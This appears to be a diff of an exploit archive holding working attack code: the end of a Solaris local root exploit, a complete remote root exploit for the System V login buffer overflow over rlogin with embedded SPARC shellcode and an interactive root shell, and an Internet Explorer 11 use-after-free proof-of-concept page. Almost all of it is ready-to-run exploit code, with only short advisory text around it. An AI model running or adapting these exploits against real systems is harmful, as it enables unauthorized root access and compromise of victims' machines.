int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_addr(int addr, char *pattern);
int find_pts(char **slave);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
void shell(int fd);
int read_prompt(int fd, char *buf, int size);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], var[VARSIZE], ff[FFSIZE];
char platform[256], release[256], cur_pass[256], tmp[256];
int i, offset, ff_addr, sc_addr, var_addr;
int plat_len, prog_len, rel;
char *arg[2] = {"foo", NULL};
int arg_len = 4, arg_pos = 1;
int pid, cfd, newpts;
char *newpts_str;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
int ret = search_ldso("strcpy");
int rwx_mem = search_rwx_mem();
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s current_pass\n\n", argv[0]);
exit(1);
}
sprintf(cur_pass, "%s\n", argv[1]);
/* get some system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
rel = atoi(release + 2);
/* prepare the evil buffer */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
buf[sizeof(buf) - 2] = '\n';
/* prepare the evil env var */
memset(var, 'B', sizeof(var));
var[sizeof(var) - 1] = 0x0;
/* prepare the fake frame */
bzero(ff, sizeof(ff));
/*
* saved %l registers
*/
set_val(ff, i = 0, DUMMY); /* %l0 */
set_val(ff, i += 4, DUMMY); /* %l1 */
set_val(ff, i += 4, DUMMY); /* %l2 */
set_val(ff, i += 4, DUMMY); /* %l3 */
set_val(ff, i += 4, DUMMY); /* %l4 */
set_val(ff, i += 4, DUMMY); /* %l5 */
set_val(ff, i += 4, DUMMY); /* %l6 */
set_val(ff, i += 4, DUMMY); /* %l7 */
/*
* saved %i registers
*/
set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to strcpy() */
set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to strcpy() */
set_val(ff, i += 4, DUMMY); /* %i2 */
set_val(ff, i += 4, DUMMY); /* %i3 */
set_val(ff, i += 4, DUMMY); /* %i4 */
set_val(ff, i += 4, DUMMY); /* %i5 */
set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */
set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */
/* fill the envp, keeping padding */
ff_addr = add_env(var); /* var must be before ff! */
sc_addr = add_env(ff);
add_env(sc);
add_env(NULL);
/* calculate the offset to argv[0] (voodoo magic) */
plat_len = strlen(platform) + 1;
prog_len = strlen(VULN) + 1;
offset = arg_len + env_len + plat_len + prog_len;
if (rel > 7)
VOODOO64(offset, arg_pos, env_pos)
else
VOODOO32(offset, plat_len, prog_len)
/* calculate the needed addresses */
var_addr = sb - offset + arg_len;
ff_addr += var_addr;
sc_addr += var_addr;
/* set fake frame's %i1 */
set_val(ff, 36, sc_addr); /* 2nd arg to strcpy() */
/* check the addresses */
check_addr(var_addr, "var_addr");
check_addr(ff_addr, "ff_addr");
/* fill the evil buffer */
for (i = 0; i < BUFSIZE - 4; i += 4)
set_val(buf, i, var_addr);
/* may need to bruteforce the distance here */
set_val(buf, 112, ff_addr);
set_val(buf, 116, ret - 4); /* strcpy(), after the save */
/* fill the evil env var */
for (i = 0; i < VARSIZE - 4; i += 4)
set_val(var, i, var_addr);
set_val(var, 0, 0xffffffff); /* first byte must be 0xff! */
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using var address\t: 0x%p\n", (void *)var_addr);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* find a free pts */
cfd = find_pts(&newpts_str);
/* fork() a new process */
if ((pid = fork()) < 0) {
perror("fork");
exit(1);
}
/* parent process */
if (pid) {
sleep(1);
/* wait for password prompt */
if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
fprintf(stderr, "Error: timeout waiting for prompt\n");
exit(1);
}
if (!strstr(tmp, "ssword: ")) {
fprintf(stderr, "Error: wrong prompt received\n");
exit(1);
}
/* send the current password */
write(cfd, cur_pass, strlen(cur_pass));
usleep(500000);
/* wait for password prompt */
if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
fprintf(stderr, "Error: timeout waiting for prompt\n");
exit(1);
}
if (!strstr(tmp, "ssword: ")) {
fprintf(stderr, "Error: wrong current_pass?\n");
exit(1);
}
/* send the evil buffer */
write(cfd, buf, strlen(buf));
usleep(500000);
/* got root? */
if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
fprintf(stderr, "Error: timeout waiting for shell\n");
exit(1);
}
if (strstr(tmp, "ssword: ")) {
fprintf(stderr, "Error: not vulnerable\n");
exit(1);
}
if (!strstr(tmp, "# ")) {
fprintf(stderr, "Something went wrong...\n");
exit(1);
}
/* semi-interactive shell */
shell(cfd);
/* child process */
} else {
/* start new session and get rid of controlling terminal */
if (setsid() < 0) {
perror("setsid");
exit(1);
}
/* open the new pts */
if ((newpts = open(newpts_str, O_RDWR)) < 0) {
perror("open");
exit(1);
}
/* ninja terminal emulation */
ioctl(newpts, I_PUSH, "ptem");
ioctl(newpts, I_PUSH, "ldterm");
/* close the child fd */
close(cfd);
/* duplicate stdin */
if (dup2(newpts, 0) != 0) {
perror("dup2");
exit(1);
}
/* duplicate stdout */
if (dup2(newpts, 1) != 1) {
perror("dup2");
exit(1);
}
/* duplicate stderr */
if (dup2(newpts, 2) != 2) {
perror("dup2");
exit(1);
}
/* close the new pts */
if (newpts > 2)
close(newpts);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
}
exit(0);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return(env_len);
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return(env_len);
}
/*
* check_addr(): check an address for 0x00, 0x04, 0x0a, 0x0d or 0x61-0x7a bytes
*/
void check_addr(int addr, char *pattern)
{
/* check for NULL byte (0x00) */
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
exit(1);
}
/* check for EOT byte (0x04) */
if (((addr & 0xff) == 0x04) || ((addr & 0xff00) == 0x0400) ||
((addr & 0xff0000) == 0x040000) ||
((addr & 0xff000000) == 0x04000000)) {
fprintf(stderr, "Error: %s contains a 0x04!\n", pattern);
exit(1);
}
/* check for NL byte (0x0a) */
if (((addr & 0xff) == 0x0a) || ((addr & 0xff00) == 0x0a00) ||
((addr & 0xff0000) == 0x0a0000) ||
((addr & 0xff000000) == 0x0a000000)) {
fprintf(stderr, "Error: %s contains a 0x0a!\n", pattern);
exit(1);
}
/* check for CR byte (0x0d) */
if (((addr & 0xff) == 0x0d) || ((addr & 0xff00) == 0x0d00) ||
((addr & 0xff0000) == 0x0d0000) ||
((addr & 0xff000000) == 0x0d000000)) {
fprintf(stderr, "Error: %s contains a 0x0d!\n", pattern);
exit(1);
}
/* check for lowercase chars (0x61-0x7a) */
if ((islower(addr & 0xff)) || (islower((addr & 0xff00) >> 8)) ||
(islower((addr & 0xff0000) >> 16)) ||
(islower((addr & 0xff000000) >> 24))) {
fprintf(stderr, "Error: %s contains a 0x61-0x7a!\n", pattern);
exit(1);
}
}
/*
* find_pts(): find a free slave pseudo-tty
*/
int find_pts(char **slave)
{
int master;
extern char *ptsname();
/* open master pseudo-tty device and get new slave pseudo-tty */
if ((master = open("/dev/ptmx", O_RDWR)) > 0) {
grantpt(master);
unlockpt(master);
*slave = ptsname(master);
return(master);
}
return(-1);
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_addr(addr - 4, sym);
return(addr);
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address NULL bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return(addr_old);
}
/*
* set_val(): copy a dword inside a buffer
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0xff000000) >> 24;
buf[pos + 1] = (val & 0x00ff0000) >> 16;
buf[pos + 2] = (val & 0x0000ff00) >> 8;
buf[pos + 3] = (val & 0x000000ff);
}
/*
* shell(): semi-interactive shell hack
*/
void shell(int fd)
{
fd_set fds;
char tmp[128];
int n;
/* quote from kill bill: vol. 2 */
fprintf(stderr, "\"Pai Mei taught you the five point palm exploding heart technique?\" -- Bill\n");
fprintf(stderr, "\"Of course.\" -- Beatrix Kidd0, alias Black Mamba, alias The Bride (KB Vol2)\n\n");
/* execute auto commands */
write(1, "# ", 2);
write(fd, CMD, strlen(CMD));
/* semi-interactive shell */
for (;;) {
FD_ZERO(&fds);
FD_SET(fd, &fds);
FD_SET(0, &fds);
if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
perror("select");
break;
}
/* read from fd and write to stdout */
if (FD_ISSET(fd, &fds)) {
if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
fprintf(stderr, "Goodbye...\n");
break;
}
if (write(1, tmp, n) < 0) {
perror("write");
break;
}
}
/* read from stdin and write to fd */
if (FD_ISSET(0, &fds)) {
if ((n = read(0, tmp, sizeof(tmp))) < 0) {
perror("read");
break;
}
if (write(fd, tmp, n) < 0) {
perror("write");
break;
}
}
}
close(fd);
exit(1);
}
/*
* read_prompt(): non-blocking read from fd
*/
int read_prompt(int fd, char *buf, int size)
{
fd_set fds;
struct timeval wait;
int n = -1;
/* set timeout */
wait.tv_sec = 2;
wait.tv_usec = 0;
bzero(buf, size);
FD_ZERO(&fds);
FD_SET(fd, &fds);
/* select with timeout */
if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) {
perror("select");
exit(1);
}
/* read data if any */
if (FD_ISSET(fd, &fds))
n = read(fd, buf, size);
return n;
}

545
platforms/solaris/remote/21180.c
View file

@ -1,545 +0,0 @@
source: http://www.securityfocus.com/bid/3681/info
The 'login' program is used in UNIX systems to authenticate users with a username and password. The utility is typically invoked at the console, by 'telnetd', 'rlogind', and if configured to do so, SSH.
Versions of 'login' descended from System V UNIX contain a buffer overflow when handling environment variables. Several operating systems such as Solaris/SunOS, HP-UX, AIX, IRIX, and Unixware contain vulnerable versions of 'login'.
Unauthenticated clients can exploit this issue to execute arbitrary code as root. On systems where 'login' is installed setuid root, local attackers can elevate privileges.
/*
* $Id: raptor_rlogin.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8
* Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Buffer overflow in login in various System V based operating systems
* allows remote attackers to execute arbitrary commands via a large number
* of arguments through services such as telnet and rlogin (CVE-2001-0797).
*
* Dedicated to my beautiful croatian ladies (hello Zrinka!) -- August 2004
*
* This remote root exploit uses the (old) System V based /bin/login
* vulnerability via the rlogin attack vector, returning into the .bss
* section to effectively bypass the non-executable stack protection
* (noexec_user_stack=1 in /etc/system).
*
* Many thanks to scut <scut@nb.in-berlin.de> (0dd) for his elite pam_handle_t
* technique (see 7350logout.c), also thanks to inode <inode@deadlocks.info>.
*
* Usage (must be root):
* # gcc raptor_rlogin.c -o raptor_rlogin -Wall
* [on solaris: gcc raptor_rlogin.c -o raptor_rlogin -Wall -lxnet]
* # ./raptor_rlogin -h 192.168.0.50
* [...]
* # id;uname -a;uptime;
* uid=0(root) gid=0(root)
* SunOS merlino 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
* 7:45pm up 12 day(s), 18:42, 1 user, load average: 0.00, 0.00, 0.01
* #
*
* Vulnerable platforms (SPARC):
* Solaris 2.5.1 without patch 106160-02 [untested]
* Solaris 2.6 without patch 105665-04 [untested]
* Solaris 7 without patch 112300-01 [untested]
* Solaris 8 without patch 111085-02 [tested]
*/
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define INFO1 "raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8"
#define INFO2 "Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define BUFSIZE 3000 // max size of the evil buffer
#define RETADDR 0x27184 // retaddr, should be reliable
#define TIMEOUT 10 // net_read() default timeout
#define CMD "id;uname -a;uptime;\n" // executed upon exploitation
char sc[] = /* Solaris/SPARC special shellcode (courtesy of inode) */
/* execve() + exit() */
"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"
"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4"
"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08";
char sparc_nop[] = /* Solaris/SPARC special nop (xor %sp, %sp, %o0) */
"\x90\x1b\x80\x0e";
/* prototypes */
int exploit_addchar(unsigned char *ww, unsigned char wc);
void fatalerr(char *func, char *error, int fd);
int net_connect(char *host, int port, int timeout);
int net_read(int fd, char *buf, int size, int timeout);
int net_resolve(char *host);
int sc_copy(unsigned char *buf, char *str, long len);
void set_val(char *buf, int pos, int val);
void shell(int fd);
void usage(char *progname);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], *p = buf;
char c, *host = NULL, term[] = "vt100/9600";
int fd, i, found, len;
int timeout = TIMEOUT, debug = 0;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* parse command line */
if (argc < 2)
usage(argv[0]);
while ((c = getopt(argc, argv, "dh:t:")) != EOF)
switch(c) {
case 'h':
host = optarg;
break;
case 't':
timeout = atoi(optarg);
break;
case 'd':
debug = 1;
break;
default:
usage(argv[0]);
}
if (!host)
usage(argv[0]);
/* connect to the target host */
fd = net_connect(host, 513, 10);
fprintf(stderr, "# connected to remote host: %s\n", host);
/* signal handling */
signal(SIGPIPE, SIG_IGN);
/* begin the rlogin session */
memset(buf, 0, sizeof(buf));
if (send(fd, buf, 1, 0) < 0)
fatalerr("send", strerror(errno), fd);
if (net_read(fd, buf, sizeof(buf), timeout) < 0)
fatalerr("error", "Timeout reached in rlogin session", fd);
/* dummy rlogin authentication */
memcpy(p, "foo", 3); // local login name
p += 4;
memcpy(p, "bar", 3); // remote login name
p += 4;
memcpy(p, term, sizeof(term)); // terminal type
p += sizeof(term);
fprintf(stderr, "# performing dummy rlogin authentication\n");
if (send(fd, buf, p - buf, 0) < 0)
fatalerr("send", strerror(errno), fd);
/* wait for password prompt */
found = 0;
memset(buf, 0, sizeof(buf));
while (net_read(fd, buf, sizeof(buf), timeout)) {
if (strstr(buf, "assword: ") != NULL) {
found = 1;
break;
}
memset(buf, 0, sizeof(buf));
}
if (!found)
fatalerr("error", "Timeout waiting for password prompt", fd);
/* send a dummy password */
if (send(fd, "pass\n", 5, 0) < 0)
fatalerr("send", strerror(errno), fd);
/* wait for login prompt */
found = 0;
memset(buf, 0, sizeof(buf));
fprintf(stderr, "# waiting for login prompt\n");
while (net_read(fd, buf, sizeof(buf), timeout)) {
if (strstr(buf, "ogin: ") != NULL) {
found = 1;
break;
}
memset(buf, 0, sizeof(buf));
}
if (!found)
fatalerr("error", "Timeout waiting for login prompt", fd);
fprintf(stderr, "# returning into 0x%08x\n", RETADDR);
/* for debugging purposes */
if (debug) {
printf("# debug: press enter to continue");
scanf("%c", &c);
}
/* prepare the evil buffer */
memset(buf, 0, sizeof(buf));
p = buf;
/* login name */
memcpy(p, "foo ", 4);
p += 4;
/* return address (env) */
set_val(p, 0, RETADDR);
p += 4;
memcpy(p, " ", 1);
p++;
/* trigger the overflow (env) */
for (i = 0; i < 60; i++, p += 2)
memcpy(p, "a ", 2);
/* padding */
memcpy(p, " BBB", 4);
p += 4;
/* nop sled and shellcode */
for (i = 0; i < 398; i++, p += 4)
memcpy(p, sparc_nop, 4);
p += sc_copy(p, sc, sizeof(sc) - 1);
/* padding */
memcpy(p, "BBB ", 4);
p += 4;
/* pam_handle_t: minimal header */
memcpy(p, "CCCCCCCCCCCCCCCC", 16);
p += 16;
set_val(p, 0, RETADDR); // must be a valid address
p += 4;
set_val(p, 0, 0x01);
p += 4;
/* pam_handle_t: NULL padding */
for (i = 0; i < 52; i++, p += 4)
set_val(p, 0, 0x00);
/* pam_handle_t: pameptr must be the 65th ptr */
memcpy(p, "\x00\x00\x00 AAAA\n", 9);
p += 9;
/* send the evil buffer, 256 chars a time */
len = p - buf;
p = buf;
while (len > 0) {
fprintf(stderr, "#");
i = len > 0x100 ? 0x100 : len;
send(fd, p, i, 0);
len -= i;
p += i;
if (len)
send(fd, "\x04", 1, 0);
usleep(500000);
}
fprintf(stderr, "\n");
/* wait for password prompt */
found = 0;
memset(buf, 0, sizeof(buf));
fprintf(stderr, "# evil buffer sent, waiting for password prompt\n");
while (net_read(fd, buf, sizeof(buf), timeout)) {
if (strstr(buf, "assword: ") != NULL) {
found = 1;
break;
}
memset(buf, 0, sizeof(buf));
}
if (!found)
fatalerr("error", "Most likely not vulnerable", fd);
fprintf(stderr, "# password prompt received, waiting for shell\n");
if (send(fd, "pass\n", 5, 0) < 0)
fatalerr("send", strerror(errno), fd);
/* wait for shell prompt */
memset(buf, 0, sizeof(buf));
found = 0;
while (net_read(fd, buf, sizeof(buf), timeout)) {
if (strstr(buf, "# ") != NULL) {
found = 1;
break;
}
memset(buf, 0, sizeof(buf));
}
if (!found)
fatalerr("error", "Most likely not vulnerable", fd);
/* connect to the remote shell */
fprintf(stderr, "# shell prompt detected, successful exploitation\n\n");
shell(fd);
exit(0);
}
/*
* exploit_addchar(): char translation for pam (ripped from scut)
*/
int exploit_addchar(unsigned char *ww, unsigned char wc)
{
unsigned char * wwo = ww;
switch (wc) {
case ('\\'):
*ww++ = '\\';
*ww++ = '\\';
break;
case (0xff):
case ('\n'):
case (' '):
case ('\t'):
*ww++ = '\\';
*ww++ = ((wc & 0300) >> 6) + '0';
*ww++ = ((wc & 0070) >> 3) + '0';
*ww++ = (wc & 0007) + '0';
break;
default:
*ww++ = wc;
break;
}
return (ww - wwo);
}
/*
* fatalerr(): error handling routine
*/
void fatalerr(char *func, char *error, int fd)
{
fprintf(stderr, "%s: %s\n", func, error);
close(fd);
exit(1);
}
/*
* net_connect(): simple network connect with timeout
*/
int net_connect(char *host, int port, int timeout)
{
int fd, i, flags, sock_len;
struct sockaddr_in sin;
struct timeval tv;
fd_set fds;
/* allocate a socket */
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
perror("socket");
exit(1);
}
/* bind a privileged port (FIXME) */
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
for (i = 1023; i > 0; i--) {
sin.sin_port = htons(i);
if (!(bind(fd, (struct sockaddr *)&sin, sizeof(sin))))
break;
}
if (i == 0)
fatalerr("error", "Can't bind a privileged port (must be root)", fd);
/* resolve the peer address */
sin.sin_port = htons(port);
if (!(sin.sin_addr.s_addr = net_resolve(host)))
fatalerr("error", "Can't resolve hostname", fd);
/* set non-blocking */
if ((flags = fcntl(fd, F_GETFL, 0)) < 0)
fatalerr("fcntl", strerror(errno), fd);
if (fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0)
fatalerr("fcntl", strerror(errno), fd);
/* connect to remote host */
if (!(connect(fd, (struct sockaddr *)&sin, sizeof(sin)))) {
if (fcntl(fd, F_SETFL, flags) < 0)
fatalerr("fcntl", strerror(errno), fd);
return(fd);
}
if (errno != EINPROGRESS)
fatalerr("error", "Can't connect to remote host", fd);
/* set timeout */
tv.tv_sec = timeout;
tv.tv_usec = 0;
/* setup select structs */
FD_ZERO(&fds);
FD_SET(fd, &fds);
/* select */
if (select(FD_SETSIZE, NULL, &fds, NULL, &tv) <= 0)
fatalerr("error", "Can't connect to remote host", fd);
/* check if connected */
sock_len = sizeof(sin);
if (getpeername(fd, (struct sockaddr *)&sin, &sock_len) < 0)
fatalerr("error", "Can't connect to remote host", fd);
if (fcntl(fd, F_SETFL, flags) < 0)
fatalerr("fcntl", strerror(errno), fd);
return(fd);
}
/*
* net_read(): non-blocking read from fd
*/
int net_read(int fd, char *buf, int size, int timeout)
{
fd_set fds;
struct timeval wait;
int n = -1;
/* set timeout */
wait.tv_sec = timeout;
wait.tv_usec = 0;
memset(buf, 0, size);
FD_ZERO(&fds);
FD_SET(fd, &fds);
/* select with timeout */
if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) {
perror("select");
exit(1);
}
/* read data if any */
if (FD_ISSET(fd, &fds))
n = read(fd, buf, size);
return n;
}
/*
* net_resolve(): simple network resolver
*/
int net_resolve(char *host)
{
struct in_addr addr;
struct hostent *he;
memset(&addr, 0, sizeof(addr));
if ((addr.s_addr = inet_addr(host)) == -1) {
if (!(he = (struct hostent *)gethostbyname(host)))
return(0);
memcpy((char *)&addr.s_addr, he->h_addr, he->h_length);
}
return(addr.s_addr);
}
/*
* sc_copy(): copy the shellcode, using exploit_addchar()
*/
int sc_copy(unsigned char *buf, char *str, long len)
{
unsigned char *or = buf;
int i;
for(i = 0; i < len; i++)
buf += exploit_addchar(buf, str[i]);
return(buf - or);
}
/*
* set_val(): copy a dword inside a buffer
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0xff000000) >> 24;
buf[pos + 1] = (val & 0x00ff0000) >> 16;
buf[pos + 2] = (val & 0x0000ff00) >> 8;
buf[pos + 3] = (val & 0x000000ff);
}
/*
* shell(): semi-interactive shell hack
*/
void shell(int fd)
{
fd_set fds;
char tmp[128];
int n;
/* quote Hvar 2004 */
fprintf(stderr, "\"Da Bog da ti se mamica nahitavala s vragom po dvoristu!\" -- Bozica (Hrvatska)\n\n");
/* execute auto commands */
write(1, "# ", 2);
write(fd, CMD, strlen(CMD));
/* semi-interactive shell */
for (;;) {
FD_ZERO(&fds);
FD_SET(fd, &fds);
FD_SET(0, &fds);
if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
perror("select");
break;
}
/* read from fd and write to stdout */
if (FD_ISSET(fd, &fds)) {
if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
fprintf(stderr, "Goodbye...\n");
break;
}
if (write(1, tmp, n) < 0) {
perror("write");
break;
}
}
/* read from stdin and write to fd */
if (FD_ISSET(0, &fds)) {
if ((n = read(0, tmp, sizeof(tmp))) < 0) {
perror("read");
break;
}
if (write(fd, tmp, n) < 0) {
perror("write");
break;
}
}
}
close(fd);
exit(1);
}
void usage(char *progname)
{
fprintf(stderr, "usage: %s [-h host] [-t timeout] [-d]\n\n", progname);
fprintf(stderr, "-h host\t\tdestination ip or fqdn\n");
fprintf(stderr, "-t timeout\tnet_read() timeout (default: %d)\n", TIMEOUT);
fprintf(stderr, "-d\t\tturn on debug mode\n\n");
exit(1);
}

165
platforms/windows/dos/40757.xhtml Executable file
View file

@ -0,0 +1,165 @@
<!--
Source: http://blog.skylined.nl/20161114001.html
Synopsis
A specially crafted web-page can cause MSIE 11 to interrupt the handling of one readystatechange event with another. This interrupts a call to one of the various C<Element­Name>Element::Notify functions to make another such call and at least one of these functions is non-reentrant. This can have various repercussions, e.g. when an attacker triggers this vulnerability using a CMap­Element object, a reference to that object can be stored in a linked list and the object itself can be freed. This pointer can later be re-used to cause a classic use-after-free issue.
Known affected versions, attack vectors and mitigations
Microsoft Internet Explorer 11
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path.
Description
When a Document­Fragment containing an applet element is added to the DOM, all elements receive a notification that they are removed from the CMarkup. Next, they are added to the DOM and receive notification of being added to another CMarkup. When the applet is added, a CObject­Element is created and added to the CMarkup. This causes a readystatechange event to fire, which interrupts the current code. During this readystatechange event, the DOM may be modified, which causes further notifications to fire. However, elements in the Document­Fragment that come after the applet element have already received a notification that they have been remove from one CMarkup, but not that they have been added to the new one. Thus, these elements may receive another notification of removal, followed by two notifications of being added to a CMarkup.
-->
<?xml version="1.0"?>
<!DOCTYPE x PUBLIC "x" "x">
<html xmlns="http://www.w3.org/1999/xhtml">
<script type="text/javascript">
<![CDATA[
// This Po­C attempts to exploit a renetrancy issue in Microsoft Internet
// Explorer to trigger a use-after-free.
// See http://blog.skylined.nl/20161114001.html for details.
var o­Doc­Elem = document.document­Element;
var o­Container, o­Map1, o­Map2, u­Event­Counter = 0;
// A C CMarkup object can have a pointer to a C CDoc object. This C
// CDoc object has a singly linked list of CMap­Elements added to the
// DOM, starting at offset 8 (See MSHTML!CMarkup::Get­Map­Head) of the CDoc
// and continuing through offset 38 of the CMap­Element.
// CDoc[8] -> CMap­Element[38]#1 -> CMap­Element[38]#2 -> etc... -> NULL
// When CMap­Element::Notify is called to add a Map element to the DOM,
// code 0x17, the CMap­Element is inserted at the start of this list.
// When CMap­Element::Notify is called to remove a Map element from the
// DOM, code 0x18, the linked list is followed to find the CMap­Element and
// remove if from the list when found.
// When CMap­Element::Notify is called twice to add the same element to the
// DOM, a loop is created, rather than the CMap­Element ending up in the
// list twice.
// When CMap­Element::Notify is called twice to remove the same element
// from the DOM, nothing happens the second time.
function on­Ready­State­Change­Callback(){
var u­Event­Id = ++u­Event­Counter;
if (u­Event­Id == 1) {
// Create a "container" DOM element with three children:
// map, applet, map.
o­Container = document.create­Element("o­Container");
o­Map1 = o­Container.append­Child(document.create­Element("map"));
o­Container.append­Child(document.create­Element("applet"));
o­Map2 = o­Container.append­Child(document.create­Element("map"));
// Add the container DOM element to the DOM document. While adding the
// applet DOM object to the DOM document a new C "CObject­Element" is
// created and added to the C CMarkup (which is roughly the equivalent
// of a DOM Document­Fragment AFAICT). This triggers a new
// readystatechange event that interrupts the current one.
o­Doc­Elem.append­Child(o­Container);
// The interrupting readystatechange event is fired after the o­Map2
// C CMap­Element::Notify method has been call to notify that the
// object is being removed from one Document­Fragement, but before it
// is notified that it is being added to another.
// List#1 -> CMap­Element#1 -> NULL
} else if (u­Event­Id == 2) {
o­Container.remove­Node(true);
// Removing the container from the document causes another round of
// calls to ::Notify for remove and add. The last call to o­Map2 was
// to inform it that it was removed from a C CMarkup. It is now
// getting another such call. This is unexpected, but the code does
// not detect it. Next, it is added to a new list.
// List#2 -> NULL
// List#2 -> CMap­Element#2 -> CMap­Element#1 -> NULL
}
if (u­Event­Id == 1) {
// Now, the delayed C CMap­Element::Notify method to add the object
// to the DOM is called. The CMap­Element is added to the same list
// again, causing a loop.
// List#2 -> CMap­Element#2 -> CMap­Element#2 -> loop.
// Finally, we remove the CMap­Element from the DOM and destroy all
// references we have to it. This causes another round of calls to
// ::Notify for remove and add, only the remove is important, as
// it fails to remove the CMap­Element from the list because it
// contains a loop.
o­Map2.remove­Node();
o­Map2 = null;
// List#2 -> CMap­Element#2 -> CMap­Element#2 -> loop.
// As far as MSIE is concerned, all references to o­Map2 have now been
// destroyed, and the element is allowed to get freed. We need to
// trick the new Memory­Protect code into actually releasing it. For
// this, we need to interrupt Java­Script execution first, which is
// done by setting a timeout.
set­Timeout(function () {
// Now the Memory­Protect code will allow the CMap­Element to be
// freed. However, it only does so when enough memory has been
// scheduled to be freed (100000 bytes). This can easily be forced
// by creating and discarding a bunch of element. The video element
// causes MSIE to allocate 0x190 bytes of memory.
var u­Elements­Count = Math.ceil(100000 / 0x190);
for (var i = 0; i < u­Elements­Count; i++) {
document.create­Element("video");
Collect­Garbage();
}
// Now the CMap­Element is finally freed.
// The list originally contained a reference to CMap­Element#1.
// When the code tries to remove this, it will follow the linked
// list and access the freed CMap­Element#2 memory.
o­Map1.remove­Node();
alert("FAIL");
}, 0);
}
}
